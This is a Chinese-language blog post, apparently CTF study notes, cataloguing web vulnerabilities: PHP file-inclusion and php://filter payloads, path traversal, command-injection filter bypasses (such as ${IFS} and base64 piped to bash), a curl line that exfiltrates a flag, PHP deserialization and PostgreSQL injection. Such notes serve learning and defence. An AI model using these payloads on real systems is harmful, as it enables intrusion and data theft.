<!DOCTYPE html> <html lang="zh"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> Web 安全漏洞总结 | Robben's personal website </title> <meta name="author" content="Robben Ge"> <meta name="description" content="Web 安全常见漏洞总结，包括文件包含、命令注入、反序列化、其他数据库注入等"> <meta name="keywords" content="personal website, research, publications, projects, blog"> <link rel="stylesheet" href="/assets/css/bootstrap.min.css?b05f9a0b7405d7c8c89c7465593dea81"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/css/mdb.min.css" integrity="sha256-jpjYvU3G3N6nrrBwXJoVEYI/0zw8htfFnhT9ljN3JJw=" crossorigin="anonymous"> <link defer rel="stylesheet" href="/assets/css/academicons.min.css?dadeb9c5d1fd12bc8d37475657446863"> <link defer rel="stylesheet" href="/assets/css/scholar-icons.css?62b2ac103a88034e6882a5be5f3e2772"> <link defer rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Roboto+Slab:100,300,400,500,700|Material+Icons&amp;display=swap"> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-github.css?591dab5a4e56573bf4ef7fd332894c99" media="" id="highlight_theme_light"> <link rel="shortcut icon" href="data:image/svg+xml,&lt;svg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20100%20100%22&gt;&lt;text%20y=%22.9em%22%20font-size=%2290%22&gt;%E2%9A%9B%EF%B8%8F&lt;/text&gt;&lt;/svg&gt;"> <link rel="stylesheet" href="/assets/css/main.css?d41d8cd98f00b204e9800998ecf8427e"> <link rel="canonical" href="https://gewenhao.win/blog/2023/Web%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"> <script src="/assets/js/theme.js?a81d82887dd692e91686b43de4542f18"></script> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-native.css?5847e5ed4a4568527aa6cfab446049ca" media="none" id="highlight_theme_dark"> <script>initTheme();</script> </head> <body class="fixed-top-nav "> <header> <nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top" role="navigation"> <div class="container"> <a class="navbar-brand title font-weight-lighter" href="/"> Robben's personal website </a> <button class="navbar-toggler collapsed ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar top-bar"></span> <span class="icon-bar middle-bar"></span> <span class="icon-bar bottom-bar"></span> </button> <div class="collapse navbar-collapse text-right" id="navbarNav"> <ul class="navbar-nav ml-auto flex-nowrap"> <li class="nav-item "> <a class="nav-link" href="/">about </a> </li> <li class="nav-item active"> <a class="nav-link" href="/blog/">blog </a> </li> <li class="nav-item "> <a class="nav-link" href="/projects/">projects </a> </li> <li class="nav-item"> <button id="search-toggle" title="Search" onclick="openSearchModal()"> <span class="nav-link">ctrl k <i class="ti ti-search"></i></span> </button> </li> <li class="toggle-container"> <button id="light-toggle" title="Change theme"> <i class="ti ti-sun-moon" id="light-toggle-system"></i> <i class="ti ti-moon-filled" id="light-toggle-dark"></i> <i class="ti ti-sun-filled" id="light-toggle-light"></i> </button> </li> </ul> </div> </div> </nav> <progress id="progress" value="0"> <div class="progress-container"> <span class="progress-bar"></span> </div> </progress> </header> <div class="container mt-5" role="main"> <div class="post"> <header class="post-header"> <h1 class="post-title">Web 安全漏洞总结</h1> <p class="post-meta"> Created on August 15, 2023 </p> <p class="post-tags"> <a href="/blog/2023"> <i class="fa-solid fa-calendar fa-sm"></i> 2023 </a>   ·   <a href="/blog/tag/web%E5%AE%89%E5%85%A8"> <i class="fa-solid fa-hashtag fa-sm"></i> Web安全</a>   <a href="/blog/tag/%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C"> <i class="fa-solid fa-hashtag fa-sm"></i> 文件操作</a>   <a href="/blog/tag/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5"> <i class="fa-solid fa-hashtag fa-sm"></i> 命令注入</a>   <a href="/blog/tag/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"> <i class="fa-solid fa-hashtag fa-sm"></i> 反序列化</a>   <a href="/blog/tag/sql%E6%B3%A8%E5%85%A5"> <i class="fa-solid fa-hashtag fa-sm"></i> SQL注入</a>   ·   <a href="/blog/category/web%E5%AE%89%E5%85%A8"> <i class="fa-solid fa-tag fa-sm"></i> Web安全</a> </p> </header> <article class="post-content"> <div id="markdown-content"> <h1 id="web-安全漏洞总结">Web 安全漏洞总结</h1> <p>本文总结了 Web 安全中常见的漏洞类型，包括文件包含、命令注入、反序列化以及其他数据库注入方法。</p> <hr> <h2 id="一文件包含漏洞">一、文件包含漏洞</h2> <h3 id="php-文件包含">PHP 文件包含</h3> <h4 id="文件包含相关函数">文件包含相关函数</h4> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">include</span><span class="p">()</span>
<span class="k">include_once</span><span class="p">()</span>
<span class="k">require</span><span class="p">()</span>
<span class="k">require_once</span><span class="p">()</span>
</code></pre></div></div> <h4 id="远程文件包含">远程文件包含</h4> <p><strong>远程代码执行：</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?file=[http|https|ftp]://example.com/shell.txt
(需要allow_url_fopen=On并且 allow_url_include=On)
</code></pre></div></div> <p><strong>利用 php 流 input：</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?file=php://input
(需要allow_url_include=On)
</code></pre></div></div> <h4 id="本地文件包含">本地文件包含</h4> <p><strong>可以做什么：</strong></p> <ul> <li>包含同目录下的文件</li> <li>获取 web 目录或者其他配置文件</li> <li>包含上传的附件：<code class="language-plaintext highlighter-rouge">?file=../attachment/media/xxx.file</code> </li> <li>读取 phpinfo 可以包含临时文件</li> <li>包含/读取 session 文件：<code class="language-plaintext highlighter-rouge">?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7</code> </li> </ul> <p><strong>如何读文件：</strong></p> <ol> <li>直接包含非 php 文件</li> <li>利用 PHP 文件流包含</li> </ol> <p><strong>示例：</strong></p> <ol> <li>使用 data:// 协议加 base64 绕过 “hello123”：</li> </ol> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">abc</span><span class="o">=</span><span class="n">data</span><span class="o">://</span><span class="n">text</span><span class="o">/</span><span class="n">plain</span><span class="p">;</span><span class="n">base64</span><span class="p">,</span><span class="n">aGVsbG8xMjM</span><span class="o">=&amp;</span><span class="n">file</span><span class="o">=</span><span class="n">php</span><span class="o">://</span><span class="n">filter</span><span class="o">/</span><span class="n">convert</span><span class="mf">.</span><span class="n">base64</span><span class="o">-</span><span class="n">encode</span><span class="o">/</span><span class="n">resource</span><span class="o">=</span><span class="n">flag</span><span class="mf">.</span><span class="n">php</span>
</code></pre></div></div> <ol> <li> <p>使用 php://filter/convert.base64-encode/resource=flag.php 绕过</p> </li> <li> <p>除了 base64-encode 还有一个常用的是 string.rot13 编码</p> </li> <li> <p>使用 iconv 编码转换：</p> </li> </ol> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?page=php://filter/convert.iconv.ASCII.UCS-2BE/resource=index.php
</code></pre></div></div> <p><strong>可以尝试二次 url 编码绕过关键词</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://127.0.0.1:2335/?page=php://filter/convert.%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35/resource=index.php
原理：php包含的filter，包含时会再解一次url编码
</code></pre></div></div> <h4 id="session-包含">Session 包含</h4> <p><strong>一、直接上传包含</strong></p> <ol> <li>首先查看 phpinfo(), save_path 为 no value 则表示存储在默认的 /tmp 或 /var/lib/php/session 目录下</li> <li>php 代码为：<code class="language-plaintext highlighter-rouge">$_SESSION["username"]=$ctfs;</code> </li> <li>当提交为：<code class="language-plaintext highlighter-rouge">?ctfs=&lt;?php phpinfo();?&gt;</code> </li> <li>内容会被保存在 tmp 目录或者 /var/lib/php/session 目录下</li> <li>直接访问：<code class="language-plaintext highlighter-rouge">?file=/tmp/sess_(session_id)</code> </li> </ol> <p><strong>二、临时文件包含</strong></p> <ol> <li> <strong>条件竞争：</strong> 删除临时文件、包含临时文件</li> <li><strong>php7.0 时：</strong></li> </ol> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">file</span><span class="o">=</span><span class="n">php</span><span class="o">://</span><span class="n">filter</span><span class="o">/</span><span class="n">string</span><span class="mf">.</span><span class="n">strip_tags</span><span class="o">/</span><span class="n">resource</span><span class="o">=/</span><span class="n">etc</span><span class="o">/</span><span class="n">passwd</span>
</code></pre></div></div> <p>会造成一个 segment fault，临时文件不会被删除。</p> <ol> <li> <strong>自包含：</strong> 自己包含自己 进入死循环 脚本永不结束</li> </ol> <h3 id="nodejs-与-python-任意文件读取">NodeJS 与 Python 任意文件读取</h3> <h4 id="nodejs-任意文件读取">NodeJS 任意文件读取</h4> <p><strong>目录穿越：</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">"</span><span class="s2">path</span><span class="dl">"</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="nx">file</span><span class="p">));</span>
</code></pre></div></div> <p>直接请求 <code class="language-plaintext highlighter-rouge">/public/../app.js</code> 浏览器会去除 <code class="language-plaintext highlighter-rouge">../</code></p> <p>使用 <code class="language-plaintext highlighter-rouge">curl --path-as-is example.com/public/../app.js</code> 但其会将 <code class="language-plaintext highlighter-rouge">../</code> 解析成路由一部分</p> <p>所以将 <code class="language-plaintext highlighter-rouge">../</code> 中 <code class="language-plaintext highlighter-rouge">/</code> url 编码，访问 <code class="language-plaintext highlighter-rouge">/public/..%2fapp.js</code></p> <h4 id="python-任意文件读取">Python 任意文件读取</h4> <p><strong>目录穿越</strong></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="sh">'</span><span class="s">/tmp</span><span class="sh">'</span><span class="p">,</span> <span class="nb">file</span><span class="p">)</span>
</code></pre></div></div> <p>利用：</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="sh">'</span><span class="s">/tmp</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">../etc/flag</span><span class="sh">'</span><span class="p">);</span>
</code></pre></div></div> <p>当过滤了 <code class="language-plaintext highlighter-rouge">./</code> 时：</p> <p>利用 python 特性直接从根目录开始写：</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="sh">'</span><span class="s">/tmp</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">/usr/local/app/app.js</span><span class="sh">'</span><span class="p">);</span>
<span class="n">其会返回后一个根目录路径</span>
</code></pre></div></div> <hr> <h2 id="二命令注入">二、命令注入</h2> <h3 id="高危函数">高危函数</h3> <p><strong>代码注入：</strong></p> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">eval</span><span class="p">()</span><span class="err">、</span><span class="nb">assert</span><span class="p">()</span><span class="err">、</span><span class="nb">preg_replace</span><span class="p">()</span><span class="err">、</span><span class="nb">call_user_func</span><span class="p">()</span><span class="n">等等</span>
</code></pre></div></div> <p><strong>命令执行：</strong></p> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">system</span><span class="p">()</span><span class="err">、</span><span class="nb">exec</span><span class="p">()</span><span class="err">、</span><span class="nb">shell_exec</span><span class="p">()</span><span class="err">、</span><span class="nb">passthru</span><span class="p">()</span><span class="err">、</span><span class="nf">pctnl_exec</span><span class="p">()</span><span class="err">、</span><span class="nb">popen</span><span class="p">()</span><span class="err">、</span><span class="nb">proc_open</span><span class="p">()</span>
<span class="n">注</span><span class="err">：</span><span class="nf">反引号是shell_exec</span><span class="p">()</span><span class="n">的别名</span>
</code></pre></div></div> <p><strong>示例：</strong></p> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'ip'</span><span class="p">]))</span> <span class="p">{</span>
    <span class="nv">$ip</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'ip'</span><span class="p">];</span>
    <span class="k">echo</span> <span class="nb">shell_exec</span><span class="p">(</span><span class="s2">"ping -c 4 "</span> <span class="mf">.</span> <span class="nv">$ip</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/?ip=127.0.0.1;ls%20-a即可利用
</code></pre></div></div> <h3 id="联合执行可利用的符号">联合执行可利用的符号</h3> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">;</span> <span class="n">无论前边运行成功还是出现错误</span><span class="err">，</span><span class="n">都运行后边</span>
<span class="o">&amp;&amp;</span> <span class="n">前边成功结束才运行后边</span>
<span class="o">||</span> <span class="n">只有前边错误后边才执行</span>
<span class="o">|</span> <span class="n">将前一个命令的输出作为后一个命令的输入</span>
<span class="o">%</span><span class="mi">0</span><span class="n">a</span> <span class="o">%</span><span class="mi">0</span><span class="n">d</span> <span class="n">换行符</span>
<span class="sb">`cat flag`</span> <span class="n">反引号内联执行</span>
<span class="n">在Linux</span> <span class="n">bash中可以使用</span><span class="p">{</span><span class="no">OS_COMMAND</span><span class="p">,</span><span class="no">ARGUMENT</span><span class="p">}</span><span class="n">来执行系统命令</span><span class="p">{</span><span class="n">cat</span><span class="p">,</span><span class="n">flag</span><span class="p">}</span>
</code></pre></div></div> <h3 id="绕过技巧">绕过技巧</h3> <h4 id="空格绕过">空格绕过</h4> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$IFS</span>
<span class="err">$</span><span class="p">{</span><span class="no">IFS</span><span class="p">}</span> <span class="err">（</span><span class="n">常用</span><span class="err">）</span>
<span class="nv">$IFS</span><span class="err">$</span><span class="mi">9</span>
<span class="o">&lt;</span>
<span class="o">&lt;&gt;</span>
<span class="p">{</span><span class="n">cat</span><span class="p">,</span><span class="n">flag</span><span class="mf">.</span><span class="n">php</span><span class="p">}</span> <span class="c1">// 用逗号实现了空格功能，需要用 {} 括起来</span>
<span class="o">%</span><span class="mi">20</span>
<span class="o">%</span><span class="mi">09</span>
</code></pre></div></div> <h4 id="关键字绕过">关键字绕过</h4> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// 1. 反斜线绕过</span>
<span class="n">ca\t</span> <span class="n">y1n\g</span><span class="mf">.</span><span class="n">php</span>

<span class="c1">// 2. 两个单引号绕过</span>
<span class="n">cat</span> <span class="n">y</span><span class="s1">''</span><span class="n">ng</span><span class="mf">.</span><span class="n">php</span>

<span class="c1">// 3. base64 编码绕过</span>
<span class="k">echo</span> <span class="s2">"Y2F0IHkxbmcucGhw"</span> <span class="o">|</span> <span class="n">base64</span> <span class="o">-</span><span class="n">d</span> <span class="o">|</span> <span class="n">bash</span>
<span class="sb">`echo "Y2F0IHkxbmcucGhw" | base64 -d`</span>

<span class="c1">// 4. hex 编码绕过</span>
<span class="k">echo</span> <span class="s2">"6361742079316E672E706870"</span> <span class="o">|</span> <span class="n">xxd</span> <span class="o">-</span><span class="n">r</span> <span class="o">-</span><span class="n">p</span> <span class="o">|</span> <span class="n">bash</span>

<span class="c1">// 5. 用 [] 匹配</span>
<span class="n">cat</span> <span class="n">y1</span> <span class="p">[</span><span class="n">n</span><span class="p">]</span> <span class="n">g</span><span class="mf">.</span><span class="n">php</span>

<span class="c1">// 6. 用 * 匹配任意</span>
<span class="n">cat</span> <span class="n">y1n</span><span class="o">*</span>
<span class="mf">7.</span><span class="n">cat</span> <span class="n">y1n</span><span class="o">?</span>
<span class="mf">8.</span><span class="n">cat</span> <span class="n">y1</span><span class="p">{</span><span class="n">a</span><span class="mf">..</span><span class="n">z</span><span class="p">}</span><span class="n">g</span>
<span class="mf">9.</span><span class="n">内联执行</span><span class="err">：</span><span class="n">如</span><span class="err">，</span><span class="n">ls</span> <span class="n">输出为flag</span> <span class="n">则执行cat</span> <span class="sb">`ls`</span>
<span class="mf">10.</span><span class="n">shell特殊变量绕过</span><span class="o">:</span><span class="n">ca</span><span class="err">$</span><span class="o">@</span><span class="n">t</span> <span class="n">fla</span><span class="err">$</span><span class="o">@</span><span class="n">g或者ca</span><span class="err">$</span><span class="mi">1</span><span class="n">t</span> <span class="n">fla</span><span class="err">$</span><span class="mi">2</span><span class="n">g</span>
</code></pre></div></div> <h4 id="命令替代">命令替代</h4> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">cat</span><span class="err">、</span><span class="n">tac</span><span class="err">、</span><span class="n">more</span><span class="err">、</span><span class="n">less</span><span class="err">、</span><span class="n">head</span><span class="err">、</span><span class="n">tail</span><span class="err">、</span><span class="n">nl</span><span class="err">、</span><span class="n">sed</span><span class="err">、</span><span class="n">sort</span><span class="err">、</span><span class="n">uniq</span>

<span class="n">more</span><span class="o">:</span><span class="n">一页一页的显示档案内容</span>
<span class="n">less</span><span class="o">:</span><span class="n">与</span> <span class="n">more</span> <span class="n">类似</span>
<span class="n">head</span><span class="o">:</span><span class="n">查看头几行</span>
<span class="n">tac</span><span class="o">:</span><span class="n">从最后一行开始显示</span><span class="err">，</span><span class="n">可以看出</span> <span class="n">tac</span> <span class="n">是</span> <span class="n">cat</span> <span class="n">的反向显示</span>
<span class="n">tail</span><span class="o">:</span><span class="n">查看尾几行</span>
<span class="n">nl</span><span class="err">：</span><span class="n">显示的时候</span><span class="err">，</span><span class="n">顺便输出行号</span>
<span class="n">od</span><span class="o">:</span><span class="n">以二进制的方式读取档案内容</span>
<span class="n">vi</span><span class="o">:</span><span class="n">一种编辑器</span><span class="err">，</span><span class="n">这个也可以查看</span>
<span class="n">vim</span><span class="o">:</span><span class="n">一种编辑器</span><span class="err">，</span><span class="n">这个也可以查看</span>
<span class="n">sort</span><span class="o">:</span><span class="n">可以查看</span>
<span class="n">uniq</span><span class="o">:</span><span class="n">可以查看</span>
<span class="n">file</span> <span class="o">-</span><span class="n">f</span><span class="o">:</span><span class="n">报错出具体内容</span>
</code></pre></div></div> <p><strong>其他读取命令：</strong></p> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">nl</span><span class="err">：</span><span class="n">nl</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">pr</span><span class="err">：</span><span class="n">pr</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">od</span><span class="err">：</span><span class="n">od</span> <span class="o">-</span><span class="n">t</span> <span class="n">c</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">rev</span><span class="err">：</span><span class="n">rev</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">fmt</span><span class="err">：</span><span class="n">fmt</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">php</span><span class="err">：</span><span class="n">php</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">cut</span><span class="err">：</span><span class="n">cut</span> <span class="o">-</span><span class="n">b1</span><span class="o">-</span> <span class="o">/</span><span class="n">flag</span><span class="err">、</span><span class="n">cut</span> <span class="o">-</span><span class="n">c1</span><span class="o">-</span> <span class="o">/</span><span class="n">flag</span><span class="err">、</span><span class="n">cut</span> <span class="o">-</span><span class="n">f1</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">sort</span><span class="err">：</span><span class="n">sort</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">uniq</span><span class="err">：</span><span class="n">uniq</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">grep</span><span class="err">：</span><span class="n">grep</span> <span class="p">{</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">curl</span><span class="err">：</span><span class="n">curl</span> <span class="n">file</span><span class="o">:///</span><span class="n">flag</span>
<span class="n">diff</span><span class="err">：</span><span class="n">diff</span> <span class="o">/</span><span class="n">flag</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">passwd</span>
<span class="n">iconv</span><span class="err">：</span><span class="n">iconv</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">paste</span><span class="err">：</span><span class="n">paste</span> <span class="o">/</span><span class="n">flag</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">passwd</span>
<span class="n">strings</span><span class="err">：</span><span class="n">strings</span> <span class="o">/</span><span class="n">flag</span>
<span class="n">base32</span><span class="err">、</span><span class="n">base64</span>
<span class="n">bzmore</span><span class="err">、</span><span class="n">bzless</span><span class="err">：</span><span class="n">bzmore</span> <span class="o">/</span><span class="n">flag</span><span class="err">、</span><span class="n">bzless</span> <span class="o">/</span><span class="n">flag</span>
</code></pre></div></div> <h4 id="escapeshellargescapeshellcmd">escapeshellarg()+escapeshellcmd()</h4> <p>同时使用会有安全隐患</p> <h4 id="无回显-rce">无回显 RCE</h4> <ol> <li><strong>curl 外带</strong></li> </ol> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">curl</span> <span class="mf">127.0.0.1</span><span class="o">:</span><span class="mi">1234</span><span class="o">/?</span><span class="n">flag</span><span class="o">=</span><span class="sb">`cat flag|base64`</span>
</code></pre></div></div> <ol> <li><strong>dnslog</strong></li> </ol> <p>使用 dnslog 平台查看回显</p> <h4 id="神奇-payload">神奇 payload</h4> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/???/??? *
可以是/bin/cat flag.php,所以可以读取到flag
</code></pre></div></div> <h4 id="bash-盲注">bash 盲注</h4> <p><strong>当机器无回显且不出网的情况下</strong></p> <p>即为延时盲注，注意截取与比较</p> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mf">1.</span><span class="n">grep</span> <span class="o">-</span><span class="n">e</span> <span class="s2">"^BJ"</span><span class="n">flag</span> <span class="o">&amp;&amp;</span><span class="n">sleep</span> <span class="mi">5</span>
<span class="mf">2.</span><span class="n">cut</span>
<span class="mf">3.</span><span class="n">url</span><span class="o">=</span><span class="s2">"http://www.baidu.com"</span>
    <span class="k">echo</span> <span class="err">$</span><span class="p">{</span><span class="n">url</span><span class="o">:</span><span class="mi">5</span><span class="o">:</span><span class="mi">11</span><span class="p">}</span>
</code></pre></div></div> <hr> <h2 id="三php-反序列化漏洞">三、PHP 反序列化漏洞</h2> <h3 id="什么是反序列化">什么是反序列化</h3> <p>PHP 的所谓的序列化也是一个将各种类型的数据，压缩并按照一定格式存储的过程，使用的函数是 serialize()</p> <p><strong>php 反序列化漏洞又称对象注入，可能会导致远程代码执行(RCE)</strong></p> <p>可以理解漏洞为执行 unserialize 函数，调用某一类并执行魔术方法(magic method)，之后可以执行类中函数，产生安全问题。</p> <h3 id="漏洞前提">漏洞前提</h3> <ol> <li>unserialize() 函数的变量可控</li> <li>php 文件中存在可利用的类，类中有魔术方法</li> </ol> <h3 id="示例">示例</h3> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="kd">class</span> <span class="nc">DEMO1</span>
<span class="p">{</span>
  <span class="k">public</span> <span class="nv">$func</span> <span class="o">=</span> <span class="s1">'safe'</span><span class="p">;</span>
  <span class="k">public</span> <span class="nv">$arg</span> <span class="o">=</span> <span class="s1">'abcd'</span><span class="p">;</span>
  <span class="k">public</span> <span class="k">function</span> <span class="n">safe</span><span class="p">()</span>
  <span class="p">{</span>
    <span class="k">echo</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="n">arg</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="k">public</span> <span class="k">function</span> <span class="n">evil</span><span class="p">()</span>
  <span class="p">{</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">arg</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">public</span> <span class="k">function</span> <span class="n">run</span><span class="p">()</span>
  <span class="p">{</span>
    <span class="nv">$this</span><span class="o">-&gt;</span><span class="p">{</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">func</span><span class="p">}();</span>
  <span class="p">}</span>
<span class="p">}</span>
<span class="nv">$obj</span> <span class="o">=</span> <span class="nb">unserialize</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'a'</span><span class="p">]);</span>
<span class="nv">$obj</span><span class="o">-&gt;</span><span class="nf">run</span><span class="p">();</span>
</code></pre></div></div> <h3 id="魔术方法">魔术方法</h3> <p>PHP 类中有一种特殊函数体的存在叫魔术方法，它的命名是以两个下划线符号 <code class="language-plaintext highlighter-rouge">__</code> 开头的，这些函数在某些情况下会自动调用而在反序列化时，如果反序列化对象中存在魔法函数，使用 unserialize() 函数同时也会触发。</p> <p><strong>常见魔术方法：</strong></p> <ul> <li> <code class="language-plaintext highlighter-rouge">__construct()</code> - 构造函数</li> <li> <code class="language-plaintext highlighter-rouge">__destruct()</code> - 析构函数</li> <li> <code class="language-plaintext highlighter-rouge">__wakeup()</code> - 反序列化时调用</li> <li> <code class="language-plaintext highlighter-rouge">__sleep()</code> - 序列化时调用</li> <li> <code class="language-plaintext highlighter-rouge">__toString()</code> - 对象被当作字符串时调用</li> <li> <code class="language-plaintext highlighter-rouge">__call()</code> - 调用不存在的方法时调用</li> <li> <code class="language-plaintext highlighter-rouge">__get()</code> - 读取不可访问属性时调用</li> <li> <code class="language-plaintext highlighter-rouge">__set()</code> - 写入不可访问属性时调用</li> </ul> <h3 id="session-反序列化">Session 反序列化</h3> <p>除了默认的 session 序列化引擎 php 外，还有几种引擎，不同引擎存储方式不同</p> <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span> <span class="n">php_binary</span> <span class="n">键名的长度对应的ASCII字符</span><span class="err">＋</span><span class="n">键名</span><span class="err">＋</span><span class="nf">经过serialize</span><span class="p">()</span> <span class="n">函数序列化处理的值</span>
<span class="o">-</span> <span class="n">php</span> <span class="n">键名</span><span class="err">＋</span><span class="n">竖线</span><span class="err">＋</span><span class="nf">经过serialize</span><span class="p">()</span><span class="n">函数序列处理的值</span>
<span class="o">-</span> <span class="n">php_serialize</span> <span class="nb">serialize</span><span class="p">()</span><span class="n">函数序列处理数组方式</span>
</code></pre></div></div> <p>三种处理器的存储格式差异，就会造成在 session 序列化和反序列化处理器设置不当时的安全隐患。</p> <hr> <h2 id="四其他数据库注入">四、其他数据库注入</h2> <h3 id="postgresql-注入">PostgreSQL 注入</h3> <h4 id="判断">判断</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">--可以注释，#不可注释，则不是mysql</span>
<span class="err">利用</span><span class="n">exp</span><span class="p">(</span><span class="mi">999999</span><span class="p">)</span><span class="err">构造报错，可判断是</span><span class="n">PostgreSQL</span>
<span class="err">或者测试延时盲注</span> <span class="err">利用</span><span class="n">pg_sleep</span><span class="p">()</span>
</code></pre></div></div> <h4 id="like-注入">LIKE 注入</h4> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">LIKE</span> <span class="err">子句中，通常与通配符结合使用，通配符表示任意字符</span>
<span class="err">•</span> <span class="err">百分号</span> <span class="o">%</span> <span class="err">相当于</span> <span class="o">*</span>
<span class="err">•</span> <span class="err">下划线</span> <span class="n">_</span> <span class="err">相当于</span> <span class="o">?</span>
<span class="k">ESCAPE</span><span class="err">用于指定转义符：</span>
  <span class="k">select</span> <span class="s1">'abc%cff'</span> <span class="k">like</span> <span class="s1">'abc-%cf'</span> <span class="k">escape</span> <span class="s1">'-'</span><span class="p">;</span>
  <span class="o">#</span><span class="err">将</span><span class="o">-</span><span class="err">指定为转义符即可继续匹配</span>
</code></pre></div></div> <h4 id="group_concat-替代">group_concat 替代</h4> <p>PostgreSQL 中并没有 group_concat() 这个函数</p> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">聚合函数</span> <span class="n">array_agg</span><span class="p">()</span>  <span class="n">string_agg</span><span class="p">()</span>
  <span class="err">常常与</span><span class="n">array_to_string</span><span class="p">()</span><span class="err">搭配作用相当于</span><span class="k">join</span>
  <span class="n">string_agg</span><span class="p">(</span><span class="n">expression</span><span class="p">,</span> <span class="k">delimiter</span><span class="p">)</span> <span class="err">直接把一个表达式变成字符串</span>
